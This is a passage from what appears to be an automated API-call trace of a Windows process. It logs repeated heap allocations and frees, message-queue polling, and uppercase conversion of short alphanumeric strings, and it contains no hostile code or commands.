Flags=0x0, Size=0x10) returned 0x34aa478 [0258.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.552] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.552] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.556] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.557] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.557] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.557] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.558] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.559] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.559] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.560] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.560] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.560] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.562] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.562] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.562] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.562] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.562] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, 